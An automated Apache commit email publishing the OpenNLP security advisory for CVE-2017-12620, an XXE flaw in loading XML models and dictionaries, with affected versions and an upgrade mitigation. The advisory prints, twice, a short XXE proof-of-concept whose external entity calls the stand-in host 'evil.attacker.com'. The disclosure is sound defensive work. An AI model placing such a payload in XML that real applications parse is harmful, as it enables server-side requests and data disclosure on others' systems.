You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@opennlp.apache.org by bu...@apache.org on 2017/10/02 09:01:52 UTC
[opennlp-site] branch asf-site updated: Automatic Site Publish by
Buildbot
This is an automated email from the ASF dual-hosted git repository.
buildbot pushed a commit to branch asf-site
in repository https://gitbox.apache.org/repos/asf/opennlp-site.git
The following commit(s) were added to refs/heads/asf-site by this push:
new f109f7b Automatic Site Publish by Buildbot
f109f7b is described below
commit f109f7bc4b248c61581071bb43501b1ff9e18d35
Author: buildbot <us...@infra.apache.org>
AuthorDate: Mon Oct 2 09:01:46 2017 +0000
Automatic Site Publish by Buildbot
---
feed.xml | 76 ++++++++++++++++++-
news/{index.html => cve-2017-12620.html} | 121 ++++++++++++++++++++++++-------
news/index.html | 1 +
3 files changed, 168 insertions(+), 30 deletions(-)
diff --git a/feed.xml b/feed.xml
index 083fb13..44307d8 100644
--- a/feed.xml
+++ b/feed.xml
@@ -24,10 +24,82 @@
<atom:link href="https://opennlp.apache.org/feed.xml" rel="self" type="application/rss+xml" />
<description>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text</description>
<language>en-us</language>
- <pubDate>Sat, 16 Sep 2017 16:47:49 +0000</pubDate>
- <lastBuildDate>Sat, 16 Sep 2017 16:47:49 +0000</lastBuildDate>
+ <pubDate>Mon, 2 Oct 2017 09:01:26 +0000</pubDate>
+ <lastBuildDate>Mon, 2 Oct 2017 09:01:26 +0000</lastBuildDate>
<item>
+ <title>CVE-2017-12620 - Apache OpenNLP XXE vulnerability</title>
+ <link>https://opennlp.apache.org/news/cve-2017-12620.html</link>
+ <pubDate>Mon, 2 Oct 2017 00:00:00 +0000</pubDate>
+ <guid isPermaLink="false">news/cve-2017-12620.html</guid>
+ <description>
+ <div class="paragraph">
+<p>Severity: Medium</p>
+</div>
+<div class="paragraph">
+<p>Vendor:
+The Apache Software Foundation</p>
+</div>
+<div class="paragraph">
+<p>Versions Affected:</p>
+</div>
+<div class="ulist">
+<ul>
+<li>
+<p>OpenNLP 1.5.0 to 1.5.3</p>
+</li>
+<li>
+<p>OpenNLP 1.6.0</p>
+</li>
+<li>
+<p>OpenNLP 1.7.0 to 1.7.2</p>
+</li>
+<li>
+<p>OpenNLP 1.8.0 to 1.8.1</p>
+</li>
+</ul>
+</div>
+<div class="paragraph">
+<p>Description:
+When loading models or dictionaries that contain XML it is possible to
+perform an XXE attack, since OpenNLP is a library, this only affects
+applications that load models or dictionaries from untrusted sources.</p>
+</div>
+<div class="paragraph">
+<p>Mitigation:
+All users who load models or XML dictionaries from untrusted sources
+should update to 1.8.2.</p>
+</div>
+<div class="paragraph">
+<p>Example:</p>
+</div>
+<div class="paragraph">
+<p>An attacker can place this:</p>
+</div>
+<div class="listingblock">
+<div class="content">
+<pre class="prettyprint highlight"><code class="language-xml" data-lang="xml">&lt;?xml version="1.0" ?&gt;
+&lt;!DOCTYPE r [
+&lt;!ELEMENT r ANY &gt;
+&lt;!ENTITY sp SYSTEM "http://evil.attacker.com/"&gt;
+]&gt;
+&lt;r&gt;&amp;sp;&lt;/r&gt;</code></pre>
+</div>
+</div>
+<div class="paragraph">
+<p>Inside one of the XML files, either a dictionary or embedded inside a
+model package, to demonstrate this vulnerability.</p>
+</div>
+<div class="paragraph">
+<p>Credit:
+This issue was discovered by Nishil Shah of Salesforce.</p>
+</div>
+<div class="paragraph">
+<p>--The Apache OpenNLP Team</p>
+</div>
+ </description>
+ </item>
+ <item>
<title>Apache OpenNLP 1.8.2 released</title>
<link>https://opennlp.apache.org/news/release-182.html</link>
<pubDate>Fri, 15 Sep 2017 00:00:00 +0000</pubDate>
diff --git a/news/index.html b/news/cve-2017-12620.html
similarity index 75%
copy from news/index.html
copy to news/cve-2017-12620.html
index 098b205..8b2ea77 100644
--- a/news/index.html
+++ b/news/cve-2017-12620.html
@@ -2,7 +2,7 @@
<html lang="en">
<head>
<meta charset="utf-8">
- <title>News - Apache OpenNLP</title>
+ <title>CVE-2017-12620 - Apache OpenNLP XXE vulnerability - Apache OpenNLP</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Apache OpenNLP is a machine learning based toolkit for the processing of natural language text." />
@@ -170,35 +170,100 @@ body {
</nav>
<div class="container">
+ <h1 class="title">CVE-2017-12620 - Apache OpenNLP XXE vulnerability</h1>
- <div class="row-fluid marketing">
- <div class="span9">
- <h2>News</h2>
- <ul>
- <li><p>2017-09-15: <a href="/news/release-182.html">Apache OpenNLP 1.8.2 released</a></p></li>
- <li><p>2017-07-08: <a href="/news/release-181.html">Apache OpenNLP 1.8.1 released</a></p></li>
- <li><p>2017-05-19: <a href="/news/release-180.html">Apache OpenNLP 1.8.0 released</a></p></li>
- <li><p>2017-02-04: <a href="/news/release-172.html">Apache OpenNLP 1.7.2 released</a></p></li>
- <li><p>2017-01-23: <a href="/news/release-171.html">Apache OpenNLP 1.7.1 released</a></p></li>
- <li><p>2016-12-31: <a href="/news/release-170.html">Apache OpenNLP 1.7.0 released</a></p></li>
- <li><p>2015-07-13: <a href="/news/release-160.html">Apache OpenNLP 1.6.0 released</a></p></li>
- <li><p>2013-04-17: <a href="/news/release-153.html">Apache OpenNLP 1.5.3 released</a></p></li>
- <li><p>2012-02-15: <a href="/news/news-2012-02-15.html">OpenNLP graduated from the incubator as a Top Level Project</a></p></li>
- <li><p>2011-12-22: <a href="/news/news-2011-12-22.html">New members and new features…​</a></p></li>
- <li><p>2011-11-28: <a href="/news/news-2011-05-02.html">First release of 1.5.1-incubating is ready!</a></p></li>
- <li><p>2011-11-28: <a href="/news/release-152.html">Apache OpenNLP 1.5.2 Incubating released</a></p></li>
- <li><p>2011-01-29: <a href="/news/news-2011-01-29.html">Issue tracker moved to JIRA</a></p></li>
- <li><p>2010-12-24: <a href="/news/news-2010-12-24.html">Working on Apache Incubator requirements</a></p></li>
- <li><p>2010-11-23: <a href="/news/news-2010-11-23.html">OpenNLP is now into Apache Incubation!</a></p></li>
- <li><p>2010-11-18: <a href="/news/news-2010-11-18.html">OpenNLP is candidated to Apache Incubation!</a></p></li>
- </ul>
- <p></p>
- <p>Subscribe to Apache OpenNLP updates using the <a href="/feed.xml">feed</a>.</p>
- </div>
- </div>
-
- <hr>
+ <div class="paragraph">
+<p>Severity: Medium</p>
+</div>
+<div class="paragraph">
+<p>Vendor:
+The Apache Software Foundation</p>
+</div>
+<div class="paragraph">
+<p>Versions Affected:</p>
+</div>
+<div class="ulist">
+<ul>
+<li>
+<p>OpenNLP 1.5.0 to 1.5.3</p>
+</li>
+<li>
+<p>OpenNLP 1.6.0</p>
+</li>
+<li>
+<p>OpenNLP 1.7.0 to 1.7.2</p>
+</li>
+<li>
+<p>OpenNLP 1.8.0 to 1.8.1</p>
+</li>
+</ul>
+</div>
+<div class="paragraph">
+<p>Description:
+When loading models or dictionaries that contain XML it is possible to
+perform an XXE attack, since OpenNLP is a library, this only affects
+applications that load models or dictionaries from untrusted sources.</p>
+</div>
+<div class="paragraph">
+<p>Mitigation:
+All users who load models or XML dictionaries from untrusted sources
+should update to 1.8.2.</p>
+</div>
+<div class="paragraph">
+<p>Example:</p>
+</div>
+<div class="paragraph">
+<p>An attacker can place this:</p>
+</div>
+<div class="listingblock">
+<div class="content">
+<pre class="prettyprint highlight"><code class="language-xml" data-lang="xml"><?xml version="1.0" ?>
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY sp SYSTEM "http://evil.attacker.com/">
+]>
+<r>&sp;</r></code></pre>
+</div>
+</div>
+<div class="paragraph">
+<p>Inside one of the XML files, either a dictionary or embedded inside a
+model package, to demonstrate this vulnerability.</p>
+</div>
+<div class="paragraph">
+<p>Credit:
+This issue was discovered by Nishil Shah of Salesforce.</p>
+</div>
+<div class="paragraph">
+<p>--The Apache OpenNLP Team</p>
+</div>
+
+ <p><em>02 October 2017</em></p>
+ <div id="share"><!-- Google Plus -->
+<div class="g-plusone" data-size="medium"></div>
+<script type="text/javascript">
+ window.___gcfg = {lang: 'en-GB'};
+
+ (function() {
+ var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
+ po.src = 'https://apis.google.com/js/plusone.js';
+ var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
+ })();
+</script>
+
+<!-- Twitter -->
+<a href="https://twitter.com/share" class="twitter-share-button" data-dnt="true">Tweet</a>
+<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
+<!-- Facebook -->
+<div class="fb-like" data-send="false" data-layout="button_count" data-width="100" data-show-faces="true"></div>
+<div id="fb-root"></div>
+<script>(function(d, s, id) {
+ var js, fjs = d.getElementsByTagName(s)[0];
+ if (d.getElementById(id)) return;
+ js = d.createElement(s); js.id = id;
+ js.src = "//connect.facebook.net/en_GB/all.js#xfbml=1";
+ fjs.parentNode.insertBefore(js, fjs);
+}(document, 'script', 'facebook-jssdk'));</script></div>
</div>
<footer class='footer'>
diff --git a/news/index.html b/news/index.html
index 098b205..71596c1 100644
--- a/news/index.html
+++ b/news/index.html
@@ -175,6 +175,7 @@ body {
<div class="span9">
<h2>News</h2>
<ul>
+ <li><p>2017-10-02: <a href="/news/cve-2017-12620.html">CVE-2017-12620 - Apache OpenNLP XXE vulnerability</a></p></li>
<li><p>2017-09-15: <a href="/news/release-182.html">Apache OpenNLP 1.8.2 released</a></p></li>
<li><p>2017-07-08: <a href="/news/release-181.html">Apache OpenNLP 1.8.1 released</a></p></li>
<li><p>2017-05-19: <a href="/news/release-180.html">Apache OpenNLP 1.8.0 released</a></p></li>
--
To stop receiving notification emails like this one, please contact
['"commits@opennlp.apache.org" <co...@opennlp.apache.org>'].